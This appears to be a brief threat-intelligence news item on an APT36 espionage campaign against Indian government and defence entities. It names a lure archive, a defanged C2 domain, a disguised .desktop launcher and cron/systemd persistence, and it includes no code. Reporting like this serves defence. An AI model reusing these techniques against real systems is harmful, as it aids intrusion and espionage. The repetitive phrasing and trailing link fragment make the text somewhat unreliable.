Transparent Tribe (APT36) Launches New Espionage Campaign Targeting India
A sophisticated cyber espionage group, known as Transparent Tribe (APT36), has been active since 2013, targeting entities in 27 countries, with a primary focus on India, Afghanistan, Germany, Iran, and Pakistan. The group's latest news was uncovered on August 1, 2025, and remains ongoing.
APT36 was first spotted in 2016 targeting Indian diplomats and military staff via phishing and watering hole attacks. The group has since expanded its operations to adjacent sectors and opportunistic targeting in other geographies, increasing its attack surface. In its latest news, APT36 uses a malicious archive 'Meeting_Notice_Ltr_ID1543ops.pdf_.zip' containing a disguised .desktop file that masquerades as a PDF but executes hidden commands via Bash, downloading and executing a hex-encoded payload silently. The analyzed malware is a suspicious 64-bit ELF executable for x86-64 with anomalies typical of malware packing, embedding a hardcoded C2 'modgovindia[.]space:4000'. APT36 ensures persistence via cron jobs and systemd service abuse, connecting to the C2 using DNS queries and UDP sockets for stealthy communication.
The majority of the victims of the APT36 news, revealed in August 2025, are geographically located in India. The group targets Indian government and defense entities via spear-phishing emails deploying custom malware for persistent espionage.
Transparent Tribe (APT36) has been actively conducting cyber espionage operations since 2013, with a significant focus on Indian entities. Its latest news, uncovered in August 2025, uses innovative methods to evade detection and maintain persistence. Security experts urge vigilance and robust cybersecurity measures to counter such advanced persistent threat groups.
%20Launches%20New%20Espionage%20Campaign%20Targeting%20India){kind=link}